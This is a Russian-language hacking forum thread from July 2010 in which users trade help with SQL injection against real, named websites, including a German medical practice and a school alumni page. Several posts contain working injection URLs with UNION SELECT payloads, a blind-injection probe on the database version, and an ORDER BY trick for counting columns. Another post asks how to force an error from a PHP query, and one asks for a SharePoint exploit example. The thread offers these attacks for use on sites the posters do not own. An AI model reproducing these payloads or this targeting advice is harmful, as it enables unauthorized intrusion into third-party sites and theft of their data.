 |
|
12.07.2010, 18:59
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами:
8399502
Репутация:
0
|
|
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
|
|
|
12.07.2010, 19:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от haito
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842+and+substring(version(),1,1)=5
крути как blind
|
|
|
|
12.07.2010, 20:10
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"server_name"[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_id` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Что можно сделать, что бы выдалась ошибка? |
|
|
|
12.07.2010, 20:37
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от SeNaP
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_real_escape_string[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"server_name"[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT `player_id` FROM `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_bans` WHERE `player_id`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$server[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' AND `expired`=0"[/COLOR][COLOR="#007700"]) or die ([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][/COLOR]
Что можно сделать, что бы выдалась ошибка? да ничё какбы не сделаешь)
|
|
|
|
12.07.2010, 20:54
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
|
|
|
|
12.07.2010, 20:55
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от гаррет-тень
Во всех факах про sql-injection при подборе столбцов описаны только варианты, когда вылетают ошибки, а если отчет об ошибках выключен, то как подобрать количество столбцов?
изменение контекста страницы.
ex.
order+by+1 -- страница загружается
order+by+100 -- Пустая страница
|
|
|
|
12.07.2010, 20:58
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
Спасибо.
|
|
|
|
12.07.2010, 20:58
|
|
Новичок
Регистрация: 10.07.2010
Сообщений: 8
С нами:
8337206
Репутация:
0
|
|
Пожалуйста, помогите как вводить этот сайт?
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'
Сообщение от None
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /Library/WebServer/Documents/alumni/html/queryTables.php on line 21
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977# |
|
|
|
12.07.2010, 21:05
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
[QUOTE="happygirl"]
Пожалуйста, помогите как вводить этот сайт?
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977'
http://www.glendorahigh.net/alumni/html/queryTables.php?requestedTable=1977#
|
|
|
|
13.07.2010, 00:27
|
|
Новичок
Регистрация: 16.05.2008
Сообщений: 14
С нами:
9467017
Репутация:
0
|
|
Как использовать уязвимость в SharePoint ??? Примерчик можно ...???
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
